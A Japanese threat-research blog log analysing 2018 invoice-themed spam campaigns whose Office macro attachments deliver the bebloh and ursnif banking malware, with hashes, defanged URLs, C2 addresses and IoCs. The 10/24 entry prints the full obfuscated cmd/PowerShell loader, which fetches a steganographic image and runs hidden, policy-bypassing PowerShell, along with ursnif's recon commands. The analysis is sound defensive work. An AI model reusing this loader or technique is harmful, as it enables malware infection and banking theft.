bomb_log

セキュリティに関するbom

2018/11/14(水)『/発注-181112』『支払依頼書』『【連絡 ※請求書】』の調査

11/14に不審メールのばらまきがあったようです。
こちらでは観測できていませんので、今回のばらまきは通常よりも少ない量の配信だったと思われます。
情報共有いただいた内容から調査を行いました。

 

■日時
2018/11/14(水) 17:00頃 - 17:20頃

 

■件名
/発注-181112
支払依頼書
【連絡 ※請求書】


■本文
入手できていませんので、以下を参照ください。
https://www.jc3.or.jp/topics/v_log/201811.html#d20181114b

 

■添付ファイル
(n)DOC20181114nnn.doc
nは数字1桁、nnnは数字3桁

・サンプル
SHA256:  8ed61abc371da7cf5ed2d8b9b7fdf20b8ca1b924c19fc9e8d50ca1feaccb6ae9
https://www.virustotal.com/#/file/8ed61abc371da7cf5ed2d8b9b7fdf20b8ca1b924c19fc9e8d50ca1feaccb6ae9/detection
https://www.hybrid-analysis.com/sample/8ed61abc371da7cf5ed2d8b9b7fdf20b8ca1b924c19fc9e8d50ca1feaccb6ae9?environmentId=100
https://www.vmray.com/analyses/8ed61abc371d/report/overview.html
https://app.any.run/tasks/be375fd7-dc24-4f6b-a7c5-f96f5ed89fd5

f:id:bomccss:20181120193007p:plain

O365のフィッシングで使われているような、青い資料になっています…。

添付ファイルのマクロが付いており、「コンテンツを有効化」のボタンをクリックすると、マクロが動作します。
しかし、マクロが一部不具合があり、マルウェアには感染しません。

 

■マクロ

1段階目で動くのはcmd.exeです。
f:id:bomccss:20181120193312p:plain

2段階目
f:id:bomccss:20181120193346p:plain

3段階目はpowershellが動作します。
f:id:bomccss:20181120193409p:plain

これをデコードすると以下の様になります。
f:id:bomccss:20181120202112p:plain

 

マルウェア
以下のペイロードを取得する想定と思われます。
hxxp://niokrat[.]com/clifind.log
・サンプル
SHA256: fb4077e5ef55027b2972e94fe54eca985dfb933702f09a640a799f31b2181834
https://www.virustotal.com/#/file/fb4077e5ef55027b2972e94fe54eca985dfb933702f09a640a799f31b2181834/details
https://www.hybrid-analysis.com/sample/fb4077e5ef55027b2972e94fe54eca985dfb933702f09a640a799f31b2181834?environmentId=120
https://www.vmray.com/analyses/fb4077e5ef55/report/overview.html

ダウンローダマルウェアのbeblohと思われます。
以下のC2へ通信は発生しますが、追加のマルウェアはダウンロードされません。
・C2
hxxps://abedirer[.]com
IP: 149.129.243[.]34

 

IoC
●URL
hxxp://niokrat[.]com/clifind.log
●IP
149.129.243[.]34
●HASH(256)
8ed61abc371da7cf5ed2d8b9b7fdf20b8ca1b924c19fc9e8d50ca1feaccb6ae9
fb4077e5ef55027b2972e94fe54eca985dfb933702f09a640a799f31b2181834

 

2018/11/06(火) 『10月5日日付の管理費請求書』『10月課金請求リスト』『10月請求書 郵送のご連絡』『11月請求書連絡』『【再送】30年10月分請求書』『ご請求書』『別注お支払いの件』『請求書』『~請求書11月1日~』『注文書の件』『申請書類の提出』『立替金報告書の件です。』『納品書フォーマットの送付』『請求データ送付します』の調査

11/6に不審メールのばらまきがありました。
10/24の復活以降、4回目のばらまきです。

 

■日時
2018/11/06(火) 17:30頃 - 21:40頃

■件名
10月5日日付の管理費請求書
10月課金請求リスト
10月請求書 郵送のご連絡
11月請求書連絡
【再送】30年10月分請求書
ご請求書
別注お支払いの件
請求書
~請求書11月1日~

以下の件名は18:45頃より追加されました。

注文書の件
申請書類の提出
立替金報告書の件です。
納品書フォーマットの送付
請求データ送付します

■本文
本文が幾つかのパターンの組み合わせで複数の形式がありますが、サンプルは以下です。

f:id:bomccss:20181112165813p:plain

f:id:bomccss:20181112165826p:plain

f:id:bomccss:20181112165839p:plain

f:id:bomccss:20181112165849p:plain

詳細は以下を参照ください。
https://www.jc3.or.jp/topics/v_log/201811.html#d20181106a
https://www.jc3.or.jp/topics/v_log/201811.html#d20181106b

 

■添付ファイル名
20181106nnnnn.xls
※nnnnnは数字5桁

・サンプル
SHA256: 81e10dc5acf7b150591d147c1101fed72d90648f1ec40a20798836d07258b804
https://www.virustotal.com/#/file/81e10dc5acf7b150591d147c1101fed72d90648f1ec40a20798836d07258b804/detection
https://www.hybrid-analysis.com/sample/81e10dc5acf7b150591d147c1101fed72d90648f1ec40a20798836d07258b804/5be14bf67ca3e1677d6f4560
https://app.any.run/tasks/322f67ac-d2e8-4c68-84da-09102ae36b5f
https://www.joesandbox.com/analysis/88303/0/html
https://www.vmray.com/analyses/81e10dc5acf7/report/overview.html

f:id:bomccss:20181112181447p:plain

以下は18:45頃より追加されたものです。

Doc0611201820nnnnnnnn.xls
※nnnnnnnnはランダムな数字8桁

・サンプル
SHA256: 4095b31681f998c808b2e7338fa8adec82c9f5049df457c9f0c0fc562e2a48ab
https://www.virustotal.com/#/file/4095b31681f998c808b2e7338fa8adec82c9f5049df457c9f0c0fc562e2a48ab/detection
https://www.hybrid-analysis.com/sample/4095b31681f998c808b2e7338fa8adec82c9f5049df457c9f0c0fc562e2a48ab/5be168e57ca3e124cb6d3e58
https://www.vmray.com/analyses/4095b31681f9/report/overview.html

f:id:bomccss:20181112181609p:plain

 

どちらのタイプの添付ファイルも同様の動作・通信を行います。

 

■プロセスの動き
今回、procmonを動作できなかった(動かすとブルースクリーンになる)ため、プロセスツリーをキャプチャできていませんが、AnyRunから参照すると以下の流れです。

f:id:bomccss:20181112185550p:plain

プロセスの動きとして新しい手口であるのは、find.exeやfindstr.exeを利用してコマンドを作成している点です。
動作としては今回もステガノグラフィを使用しており、画像ファイルにアクセスした後、画像ファイルから更にコマンドを取得して、PowerShellで実行しています。

■通信先
通信先をまとめると以下の動きとなります。

f:id:bomccss:20181112191139p:plain


最初にアクセスが発生するのは、以下の画像ファイルで、これはステガノグラフィを行う為です。
hxxps://images2.imgbox[.]com/90/f1/gat2MVsK_o[.]png
IP: 208.99.84[.]104

f:id:bomccss:20181112191116p:plain


次に通信が発生するのは以下であり、ダウンローダマルウェアのbeblohです。
hxxp://olideron[.]com/connmouse
IP: 188.237.190[.]24
SHA256: 75ca5c2caf5216140f8e3e34160bdc64ce59d75fce1feeaa809ec18f01427783
https://www.virustotal.com/#/file/75ca5c2caf5216140f8e3e34160bdc64ce59d75fce1feeaa809ec18f01427783/detection
https://www.vmray.com/analyses/75ca5c2caf52/report/overview.html
https://app.any.run/tasks/0bc5e79b-5f81-4d73-b1b4-cdce981daa41

・C2
beblohは10分程度すると、以下のC2と約5分毎に通信を行います。
hxxps://pogertan[.]com
IP: 216.58.199[.]228

C2と通信をすると、以下の不正送金マルウェア、ursnifをダウンロードします。
hxxp://iglesiamistral[.]org/audio/ceeb/educat[.]exe
IP: 217.160.0[.]251
SHA256: dba40065b6efc6ae10e26ba608817ff04bdbc976e07016d78d0b4a63492e3ae4
https://www.virustotal.com/#/file/dba40065b6efc6ae10e26ba608817ff04bdbc976e07016d78d0b4a63492e3ae4/detection
https://www.vmray.com/analyses/dba40065b6ef/report/overview.html

・C2
ursnifは以下どちらかのC2へ通信します。
hxxps://niperola[.]com
IP: 5.8.88[.]247
hxxps://bagersim[.]com
IP:  107.150.102[.]158

IoC
●URL
hxxps://images2.imgbox[.]com/90/f1/gat2MVsK_o[.]png
hxxp://olideron[.]com/connmouse
hxxps://pogertan[.]com
hxxp://iglesiamistral[.]org/audio/ceeb/educat[.]exe
hxxps://niperola[.]com
hxxps://bagersim[.]com
●IP
208.99.84[.]104
188.237.190[.]24
216.58.199[.]228
217.160.0[.]251
5.8.88[.]247
107.150.102[.]158
●HASH(SHA256)
81e10dc5acf7b150591d147c1101fed72d90648f1ec40a20798836d07258b804
4095b31681f998c808b2e7338fa8adec82c9f5049df457c9f0c0fc562e2a48ab
75ca5c2caf5216140f8e3e34160bdc64ce59d75fce1feeaa809ec18f01427783
dba40065b6efc6ae10e26ba608817ff04bdbc976e07016d78d0b4a63492e3ae4

2018/11/01(木) 『立替金報告書の件です。』『申請書類の提出』『注文書の件』『請求データ送付します』『納品書フォーマットの送付』『10月請求書の件』『2018年10月度 御請求書』『RE: 10月分WO』『【請求書、見積書送付】30/10-11』『再)ご請求書~』『請求書送信のご連絡』『預かり金依頼書の送付(追い金)』の調査

11/1(木)にも不審メール のばらまきがあったようです。
こちらでは観測できていませんので、今回のばらまきは通常よりも少ない量の配信だったと思われます。
情報共有いただいた内容から調査を行いました。

 

■日時
2018/11/01(木) 18:00頃 - 

■件名
立替金報告書の件です。
申請書類の提出
注文書の件
請求データ送付します
納品書フォーマットの送付

※この件名は10/24にばらまかれたものと同様です。

19:00頃より、以下の件名でもばらまきがあったようです。

■件名
10月請求書の件
2018年10月度 御請求書
RE: 10月分WO
【請求書、見積書送付】30/10-11
再)ご請求書~
請求書送信のご連絡
預かり金依頼書の送付(追い金)

※この件名は10/30にばらまかれたものと同様です。


■添付ファイル名(18時以降)
nnnn DOC20181101nnn.xls
※nnnnは数字4桁、nnnは数字3桁

・サンプル
SHA256: c5e3ea84d2367239a3edff9074158e7af13b95edbc87d576c8d97e2536f3ba3a
https://www.virustotal.com/#/file/c5e3ea84d2367239a3edff9074158e7af13b95edbc87d576c8d97e2536f3ba3a/detection
https://www.hybrid-analysis.com/sample/c5e3ea84d2367239a3edff9074158e7af13b95edbc87d576c8d97e2536f3ba3a?environmentId=100
https://www.joesandbox.com/analysis/87512/0/html
https://www.joesandbox.com/analysis/87674/0/html
https://www.vmray.com/analyses/c5e3ea84d236/report/overview.html
https://app.any.run/tasks/3a54682a-4cf7-4688-986a-5458004f88f7

f:id:bomccss:20181108170207p:plain

 

■添付ファイル名(19時以降)
-nnnnnnn.xls
※n…は数字7桁

■添付ファイル名
-nnnnnnn.xls※n数字7桁

・サンプル
SHA256: bfe8ab19b3e3273999f7045651e745fad67690e314a5ae32a5f245c4576bc668
https://www.virustotal.com/#/file/bfe8ab19b3e3273999f7045651e745fad67690e314a5ae32a5f245c4576bc668/detection
https://www.hybrid-analysis.com/sample/bfe8ab19b3e3273999f7045651e745fad67690e314a5ae32a5f245c4576bc668?environmentId=120
https://www.joesandbox.com/analysis/87557/0/html

 

どちらの件名の添付ファイルも同様の動作・通信を行います。

 

■プロセスの動き
エクセルを開き、マクロを有効化すると、マクロが実行されます。
マクロから難読化されたcmd.exeが3段階で実行されます。
そこからWMIC.exeが実行され、さらにPowerShell.exeが実行されます。

f:id:bomccss:20181108170251p:plain

 

■接続先
最初に以下のファイルへアクセスします。
hxxps://images2.imgbox[.]com/52/30/CFHzOzP4_o.png
IP: 208.99.84[.]100

f:id:bomccss:20181108173332p:plain

画像ファイルですが、画像の中にスクリプトが含まれており、そのスクリプトを後段で実行します。
ステガノグラフィと呼ばれる手法です。
その後、以下の不正送金マルウェアursnifを取得します。

hxxp://martenod[.]com/ufolder
IP: 217.156.87[.]2

SHA256: 4c603d763a2b79e36492413ff788e1dd795bc09c67b2f4eccad5f339ebe44e89
https://www.virustotal.com/#/file/4c603d763a2b79e36492413ff788e1dd795bc09c67b2f4eccad5f339ebe44e89/detection
https://www.hybrid-analysis.com/sample/4c603d763a2b79e36492413ff788e1dd795bc09c67b2f4eccad5f339ebe44e89?environmentId=100
https://www.vmray.com/analyses/4c603d763a2b/report/overview.html

なお、取得する際にUser-Agetは以下を使用します。
"Mozilla/5.0 (Windows NT; Windows NT 10.0; us-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.0.500.0 Safari/534.6")

ファイルはダウンロード後、%Temp%\pviewer.exe としてファイルが実行されます。

 

■C2
hxxps://makarcheck[.]com
IP: 47.254.153[.]36

※C2は10/24のものと同じです。

 

IoC
●URL
hxxps://images2.imgbox[.]com/52/30/CFHzOzP4_o.png
hxxp://martenod[.]com/ufolder
hxxps://makarcheck[.]com
●IP
208.99.84[.]100
217.156.87[.]2
47.254.153[.]36
●HASH(SHA256)
c5e3ea84d2367239a3edff9074158e7af13b95edbc87d576c8d97e2536f3ba3a
bfe8ab19b3e3273999f7045651e745fad67690e314a5ae32a5f245c4576bc668
4c603d763a2b79e36492413ff788e1dd795bc09c67b2f4eccad5f339ebe44e89

2018/10/30(火)『10月請求書の件』『2018年10月度 御請求書』『RE: 10月分WO』『【請求書、見積書送付】30/10-11』『再)ご請求書〜』『請求書送信のご連絡』『預かり金依頼書の送付(追い金)』の調査

10/24に引き続き、10/30にも不審メールのばらまきを観測しました。
過去8月までに行われいてたように、火曜日のばらまきです。

 

■日時
2018/10/30(火) 18:10頃 - 21:20頃

■件名
10月請求書の件
2018年10月度 御請求書
RE: 10月分WO
【請求書、見積書送付】30/10-11
再)ご請求書〜
請求書送信のご連絡
預かり金依頼書の送付(追い金)

■添付ファイル(その1)
[nnn] 請求書(2018年10月).xls
※nnnは数字3桁
サンプル

・SHA256: cac15934c258df2a1cc9c5359004f655e40a51cee6a255892e7884b0210425e3
https://www.virustotal.com/#/file/cac15934c258df2a1cc9c5359004f655e40a51cee6a255892e7884b0210425e3/detection
https://www.hybrid-analysis.com/sample/cac15934c258df2a1cc9c5359004f655e40a51cee6a255892e7884b0210425e3?environmentId=120
https://www.joesandbox.com/analysis/87288/0/html
https://www.vmray.com/analyses/cac15934c258/report/overview.html
https://app.any.run/tasks/d2b10e28-e4ba-43a8-8133-7d5820f68c6f
https://app.any.run/tasks/7e531e69-6988-4b8e-b3ca-72f3bdb410a9
https://app.any.run/tasks/8769316a-2fc0-40db-b353-f7be6b295af9
https://app.any.run/tasks/893d89a5-9783-4f92-bea0-28c52f1f3384
https://app.any.run/tasks/3c362ab8-ccfc-47ef-93b3-9ad37c68694f

・SHA256: 8da48928f824f5f4da56c1bee55d1b8a42ee416bd3b1527bf88f2ea440c9285f
https://www.virustotal.com/#/file/8da48928f824f5f4da56c1bee55d1b8a42ee416bd3b1527bf88f2ea440c9285f/detection
https://www.hybrid-analysis.com/sample/8da48928f824f5f4da56c1bee55d1b8a42ee416bd3b1527bf88f2ea440c9285f?environmentId=100
f:id:bomccss:20181108010606p:plain

 

一定の時間以降、同一の件名のメールに対し、別の添付ファイルでの配信に変化していました。添付ファイルの外見は異なりますが、動作は同じようです。

■添付ファイル(その2)
20181030nnnn.xls
※nnnnは数字4桁

・SHA256: f39618fbdbb3788fa9444c84522a069b867e3237567ddd722f5e9a42838a4371
https://www.virustotal.com/#/file/f39618fbdbb3788fa9444c84522a069b867e3237567ddd722f5e9a42838a4371/details
https://www.hybrid-analysis.com/sample/f39618fbdbb3788fa9444c84522a069b867e3237567ddd722f5e9a42838a4371?environmentId=100
https://app.any.run/tasks/b3b30c99-921e-4065-a73e-734561464ca7
https://app.any.run/tasks/ebd46085-98af-4f46-9c8c-d87161246eba
https://app.any.run/tasks/f22f100c-2d9e-4386-af5a-59b8ba519d34
https://app.any.run/tasks/13d40f47-5e59-40f8-bf16-cf2d918f18d9
https://app.any.run/tasks/eb846b2e-b705-46c2-8d39-65dc03c2d111
https://www.joesandbox.com/analysis/87186/0/html
https://www.joesandbox.com/analysis/87289/0/html
https://www.vmray.com/analyses/f39618fbdbb3/report/overview.html

f:id:bomccss:20181108011258p:plain

 

■通信先
通信は発生しません。
というのも、Excelに含まれるマクロから実行されるPowerShellのコードに誤りが含まれており、攻撃者が意図したであろう通信先への通信が発生していません。
つまり、マルウェア感染も発生しません。

 

攻撃者もコードをミスすることがあります。
過去にも不審メールのバラマキでダウンロードするjsファイルがうまく動作しない等を観察しています。

 

PowerShellのコードを動作するように正しく組み替えると、以下への通信が発生すると思われます。
hxxps://image.ibb.co/jrDJv0/hp.png
画像イメージとしては10/24と同様です。これはステガノグラフィと呼ばれる攻撃手法で、画像の中に攻撃コードが含まれています。

f:id:bomccss:20181026180500p:plain

先日のCrowdStrikeさんのblogにあった解析手法で同様にコードの抽出は可能です。

コードが抽出されるとクリップボードを経由後、以下のマルウェアを取得します。

 

マルウェア(ursnif)
不正送金マルウェア(バンキングトロジャン)のursnifです。
hxxp://martenod[.]com/worldtime
41.110.200[.]194
・SHA256:51BC32788B49ACA2384CD07DCE9F8AC63F07F52C27CF33C938E01C64C374EEE4https://www.virustotal.com/#/file/51bc32788b49aca2384cd07dce9f8ac63f07f52c27cf33c938e01c64c374eee4/detection
https://www.hybrid-analysis.com/sample/51bc32788b49aca2384cd07dce9f8ac63f07f52c27cf33c938e01c64c374eee4?environmentId=100
https://app.any.run/tasks/9396a7c5-4bd2-4324-8a95-71f18126cabb
https://www.vmray.com/analyses/51bc32788b49/report/overview.html

 

この検体のC2サーバは以下になります。
C2:hxxps://makarcheck[.]com
IP: 47.254.153[.]36

 

 

IOC
●URL
hxxps://image.ibb.co/jrDJv0/hp.png
hxxp://martenod[.]com/worldtime
hxxps://makarcheck[.]com
●IP
47.254.153[.]36
41.110.200[.]194
●SHA256
cac15934c258df2a1cc9c5359004f655e40a51cee6a255892e7884b0210425e3
8da48928f824f5f4da56c1bee55d1b8a42ee416bd3b1527bf88f2ea440c9285f
f39618fbdbb3788fa9444c84522a069b867e3237567ddd722f5e9a42838a4371
51bc32788b49aca2384cd07dce9f8ac63f07f52c27cf33c938e01c64c374eee4

2018/10/24(水) 『注文書の件』『申請書類の提出』『立替金報告書の件です。』『納品書フォーマットの送付』『請求データ送付します』の調査

 8/8以降止まっていた不正送金マルウェアへの感染を狙った不審メールのばらまきが再び発生しました。
以下、調査内容となります。

 

■日時
2018/10/24(水) 15:50頃 - 21:10頃

■件名
注文書の件
申請書類の提出
立替金報告書の件です。
納品書フォーマットの送付
請求データ送付します

■添付ファイル名
DOC2410201810nnnnnn.xls
※nnnnnnは数字6桁

ファイルハッシュとしては幾つか種類があるようです。
https://www.hybrid-analysis.com/sample/54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2e?environmentId=100
https://www.hybrid-analysis.com/sample/b7a6ebfb32c76763473cf2d59a6cec856fe34c14bd47362e7fdf05bc8aa6a65c?environmentId=100
https://www.hybrid-analysis.com/sample/f8b3ebde86931a45ffe0e187704aee1968a023d2539c5ab622c7073d70a8fba6?environmentId=100
https://www.virustotal.com/ja/file/54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2e/analysis/1540366163/
https://app.any.run/tasks/34bb2323-4c1d-4b01-8377-c7bdbc47ee18
https://www.vmray.com/analyses/54303e5aa05d/report/overview.html

添付ファイルは一例として以下のようなファイルになります。

f:id:bomccss:20181026172220p:plain

ファイル内の記載に従い「編集を有効にする」「コンテンツの有効化」を実行すると感染が始まります。

 

■マクロの動作
Excelに仕込まれたマクロが実行されると、cmd.exeからPowershell.exeが裏で実行されます。

コマンドその1

cmd.exe /V:ON/C"set lW=o.crm`VPx57^^l(SEX]L8{-Y=GZU:K%0B[9ia2eb*yftp_/T$j1'vdMF^|C\Hwk^&)WAIDn+}h4,sg6;3 R""ON&&for %9 in (15,2,70,82,45,78,78,47,71,24,10,23,32,42,22,7,15,17,13,50,53,50,68,50,64,46,70,50,62,78,76,78,78,78,47,71,19,16,10,23,78,32,42,40,43,37,17,13,50,14,40,73,42,15,4,1,46,50,68,50,15,8,50,68,50,46,50,68,50,1,15,83,2,50,68,50,0,50,68,50,66,65,67,74,50,62,76,78,78,1,13,81,20,49,69,20,30,69,81,78,21,41,50,12,50,72,50,73,35,50,62,78,13,50,35,50,62,78,13,81,20,30,69,20,36,69,20,49,69,81,78,21,41,50,83,37,59,50,72,50,2,42,50,72,50,21,82,38,48,37,50,62,76,11,11,11,61,13,81,20,30,69,20,49,69,81,21,41,78,50,64,52,52,21,46,50,72,50,40,43,37,50,62,78,21,64,73,73,37,4,38,12,40,83,35,4,37,78,81,14,40,73,42,37,4,1,66,3,35,59,34,67,74,81,76,47,20,74,69,23,11,11,11,61,13,50,35,50,62,78,13,81,20,71,69,20,36,69,20,49,69,20,30,69,20,77,69,81,21,41,78,50,1,31,34,50,72,50,34,67,74,50,72,50,59,50,72,50,42,4,35,43,50,72,50,14,40,73,42,37,4,1,66,3,35,50,62,13,13,11,11,11,61,13,50,35,50,62,78,13,81,20,30,69,20,49,69,20,77,69,20,36,69,81,78,21,41,78,50,83,37,42,1,50,72,50,63,37,50,72,50,42,50,72,50,38,56,12,34,37,67,50,62,62,1,13,81,20,49,69,20,30,69,81,78,21,41,50,43,37,67,79,37,35,52,50,72,50,82,50,62,1,65,67,51,0,60,37,13,81,70,42,42,43,73,27,45,45,34,4,35,74,37,73,36,1,34,4,74,38,0,8,1,2,0,4,45,2,35,45,19,19,45,64,36,25,14,12,63,75,14,44,0,1,43,67,74,81,62,62,76,47,20,82,69,23,11,11,11,61,13,50,35,50,62,78,13,81,20,30,69,20,49,69,81,21,41,50,31,40,42,37,50,72,50,32,17,50,62,78,49,19,75,30,76,13,30,1,1,36,62,11,11,11,55,1,13,50,29,50,62,20,41,0,3,37,35,2,70,13,47,20,8,69,78,34,67,13,30,1,1,75,49,33,62,62,20,47,20,43,69,23,47,20,74,69,1,13,81,20,30,69,20,49,69,81,78,21,41,78,50,24,37,42,7,34,50,72,50,8,37,12,50,62,1,65,67,51,0,60,37,13,47,20,8,69,72,47,20,44,69,62,76,47,20,0,69,32,47,20,44,69,39,75,36,30,68,47,20,16,69,17,23,13,78,78,47,71,74,10,27,27,13,81,20,49,69,20,30,69,81,21,41,78,50,12,0,0,3,50,72,50,54,50,62,1,65,67,51,0,60,37,13,13,47,20,43,69,1,81,31,81,21,38,35,67,52,49,9,62,39,49,75,62,21,38,0,3,13,47,20,43,69,1,81,74,81,78,21,38,35,67,52,78,49,9,62,62,69,69,76,11,11,11,61,13,81,20,30,69,20,49,69,81,78,21,41,50,65,50,72,50,15,16,50,62,13,78,13,78,18,14,78,78,51,64,79,65,35,38,18,15,27,71,19,8,10,78,62,1,6,35,12,26,15,27,27,81,35,5,73,2,34,34,81,1,81,74,37,42,5,73,5,46,3,65,67,24,81,13,47,20,82,69,32,30,1,1,49,77,71,49,17,62,62,78,55,2,27,57,59,65,67,52,82,59,73,57,14,40,14,42,37,4,77,36,57,56,12,34,7,1,15,8,15,78,61,61,56,53,52,1,15,8,37,78,78,78,45,2,78,43,0,59,37,3,14,58,15,18,18,78,21,15,8,37,56,26,46,65,82,83,43,82,12,78,31,22,7,35,73,73,78,78,21,83,0,67,34,83,78,21,59,65,67,52,82,59,14,46,22,78,58,65,66,66,15,67,78,21,67,82,43,79,82,54,34,78,78,21,73,42,78,78,21,83,0,12,82,74,82,78,78,78,78,78,1,78,13,78,78,57,81,20,30,69,20,49,69,20,36,69,57,81,78,21,41,78,50,64,52,52,50,72,13,78,57,81,20,30,69,20,49,69,57,81,78,21,41,50,21,50,72,50,46,40,43,50,78,62,72,50,37,50,78,78,62,78,21,64,73,73,37,4,78,13,57,81,20,77,69,20,49,69,20,9,69,20,30,69,20,71,69,20,36,69,57,81,78,21,41,78,13,78,78,57,81,20,36,69,20,49,69,20,30,69,57,81,78,21,41,50,52,50,72,50,1,63,34,67,50,72,50,37,4,50,78,78,62,72,50,40,73,50,72,50,73,50,72,50,14,50,72,13,78,57,81,20,36,69,20,49,69,20,30,69,57,81,21,41,78,50,54,0,3,4,50,72,50,1,50,72,50,0,59,73,50,62,72,50,42,50,62,78,78,78,76,78,78,78,11,11,11,61,78,78,13,78,78,78,47,20,37,5,83,6,5,27,2,82,53,73,5,43,37,2,69,32,71,72,49,9,72,36,9,17,21,48,82,65,83,50,50,62,78,13,78,78,13,78,32,14,22,14,42,37,53,1,63,34,83,66,0,63,73,1,54,0,3,53,14,1,56,18,65,7,38,82,35,79,52,17,27,27,13,57,81,20,30,69,20,49,69,57,81,78,21,41,78,50,24,50,72,13,57,81,20,30,69,20,49,69,57,81,78,21,41,50,37,50,72,50,42,42,15,8,46,50,78,62,62,1,57,81,34,5,83,51,5,0,28,15,57,81,13,78,78,62,78,78,62,78,78,62,78,76,78,78,32,14,40,73,42,37,4,1,63,34,67,52,0,59,73,1,54,0,3,4,73,1,56,12,34,43,38,0,35,3,52,17,27,27,13,57,81,20,30,69,20,49,69,57,81,78,21,41,50,56,12,50,72,50,37,35,3,50,78,62,1,57,81,34,5,83,51,82,5,60,15,57,81,13,78,62,84)do set Rc=!Rc!!lW:~%9,1!&&if %9 geq 84 cmd /C!Rc:~-1334!"

コマンドその2

cmd /CEchO/ $4G7=[tYPE]('M'+'ATh') ; $48X7= [type]('SystEm.T'+'Ex'+'T'+'.ENc'+'o'+'DIng'); .("{1}{0}" -f'l','sa') ('a') ("{0}{2}{1}" -f'New','ct','-Obje');^^^&("{0}{1}"-f 'Add-T','ype') -AssemblyName "System.Drawing";${g}=^^^&('a') ("{4}{2}{1}{0}{3}"-f '.Bi','ing','w','tmap','System.Dra')*1.("{1}{0}" -f'penRead','O').Invoke("hxxps://images2.imgbox[.]com/ca/88/A2ZSlW6S_o.png"));${O}=^^^&('a') ("{0}{1}"-f'Byte','[]') 1860;(0..2)^^^|.('%'){foreach(${x} in(0..619)){${p}=${g}.("{0}{1}" -f 'GetPi','xel').Invoke(${x},${_});${o}[${_}*620+${X}]=( $4g7::("{1}{0}"-f 'loor','F').Invoke*2}};^^^&("{0}{1}" -f'I','EX')( ( LS vARIabLE:48x7 ).ValUE::"a`scii"."get`s`TrInG"(${O}[0..1341])) |c:\wIndOws\SyStem32\CliP.ExE &&CMd.Exe /c powerSHELL -ExeCUTIONpOl BYPass -NoniN -wIndOwSTY HIDDEn -nOpROFi -st -NolOgO . ( \"{0}{1}{2}\" -f 'Add',( \"{0}{1}\" -f'-','Typ' ),'e' ) -Assem (\"{3}{1}{5}{0}{4}{2}\" -f ( \"{2}{1}{0}\" -f'd','.Win','em' ),'ys','s','S',( \"{2}{1}{0}\"-f 'Form','.','ows'),'t') ; ^^^& ( ${e`NV`:cOMs`pec}[4,15,25]-jOIN'') ( ( [SYSteM.WiNDoWs.ForMS.CLIPbOaRd]::(\"{0}{1}\" -f 'G',(\"{0}{1}\" -f'e','ttExT' )).\"i`Nv`oKE\"( ) ) ) ; [System.Windows.Forms.Clipboard]::(\"{0}{1}\" -f'Cl','ear' ).\"i`NvO`kE\"( )

上記コードの中で、hxxps://images2.imgbox[.]com/ca/88/A2ZSlW6S_o.png のファイルを取得しています。
ファイルの外見は以下です。

f:id:bomccss:20181026180500p:plain

この画像からPowerShellによって画像に含まれたダウンロードスクリプトを抽出しています。
これはステガノグラフィと呼ばれる手口で、8月にイタリアで発生したursnifのばらまきの際にこの手法が使われています。

コマンドその3

抽出したダウンロードスクリプトクリップボードを経由してPowerShellで実行しています。

c:\wIndOws\SyStem32\CliP.ExE
CMd.Exe /c powerSHELL -ExeCUTIONpOl BYPass -NoniN -wIndOwSTY HIDDEn -nOpROFi -st -NolOgO . ( \"{0}{1}{2}\" -f 'Add',( \"{0}{1}\" -f'-','Typ' ),'e' ) -Assem (\"{3}{1}{5}{0}{4}{2}\" -f ( \"{2}{1}{0}\" -f'd','.Win','em' ),'ys','s','S',( \"{2}{1}{0}\"-f 'Form','.','ows'),'t') ; ^& ( ${e`NV`:cOMs`pec}[4,15,25]-jOIN'') ( ( [SYSteM.WiNDoWs.ForMS.CLIPbOaRd]::(\"{0}{1}\" -f 'G',(\"{0}{1}\" -f'e','ttExT' )).\"i`Nv`oKE\"( ) ) ) ; [System.Windows.Forms.Clipboard]::(\"{0}{1}\" -f'Cl','ear' ).\"i`NvO`kE\"( )

この手口については、以下のブログで詳細を解説しています。
https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/

ダウンロードスクリプトは以下からマルウェアをダウンロードし、%Temp%フォルダ配下にpain.exeという名前で保存します。
hxxp://pigertime[.]com/mksettting
IP: 62.141.244[.]144
なお、その際はUser-Agentとして以下を使用します

Mozilla/5.0 (Windows NT; Windows NT 10.0; us-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6

f:id:bomccss:20181026183026p:plain

 

マルウェアの動作

ダウンロード、感染するマルウェアは以下のダウンローダマルウェアのbebloh(別名URLZONE)です。

https://www.hybrid-analysis.com/sample/03fe36e396a2730fa9a51c455d39f2ba8168e5e7b1111102c1e349b6eac93778/5bd01c227ca3e152b763b609

このマルウェアのC2サーバは以下です。
hxxps://oaril[.]com
IP: 47.254.153[.]36
C2サーバと通信し、ダウンロード先URLを取得します。取得される最終的なマルウェアは以下になります。
hxxp://lersow[.]com/images/beckky[.]exe
IP: 134.119.234[.]175
https://www.hybrid-analysis.com/sample/2b277c411944cb25bf454ad5dc38d32e8eed45eac058304982c15646720990cf?environmentId=100
https://www.virustotal.com/ja/file/2b277c411944cb25bf454ad5dc38d32e8eed45eac058304982c15646720990cf/analysis/1540364647/
https://urlhaus.abuse.ch/url/70826/
https://www.vmray.com/analyses/2b277c411944/report/vm_info.html
f:id:bomccss:20181026183051p:plain

 

マルウェア(二次検体)の動作

ダウンロードされるマルウェアはursnif(別名gozi,Dreambot,ISFB)と呼ばれる不正送金マルウェアです。
感染後、以下のようなコマンドを実行し感染先の環境の調査を自動で行い、最後のコマンドで取得したファイルをzipファイルへと変換しC2サーバへと送信します。

systeminfo.exe
net view
nslookup 127.0.0.1
tasklist.exe /SVC
driverquery.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
makecab.exe /F

C2サーバは以下です。IPはbeblohと同一先に解決されます。
hxxps://purbs[.]com
IP: 47.254.153[.]36

 

ursnifとしての動作は以前と変更はないと思われます。
バンキングマルウェアとして、キーロガーやWebサイトへのインジェクションによるパスワード搾取やhiddenVNCを利用した遠隔操作などが可能と思われます。
今回、検証環境ではC2サーバからコンフィグを取得できていないため、対象とされている銀行サイトがどこかまでつかめておりませんが、これまでと同様であれば国内の主要な銀行はほぼ網羅されており、更にはGoogleAmazonなども含まれていると思われます。

 

Excelを開いてからursnifまでのプロセスの動きは以下のようになります。
何故かursnifに3度感染しているように思われます。(backkey.exe, backkey.exe, mailacc.exe)

f:id:bomccss:20181026195910p:plain

 

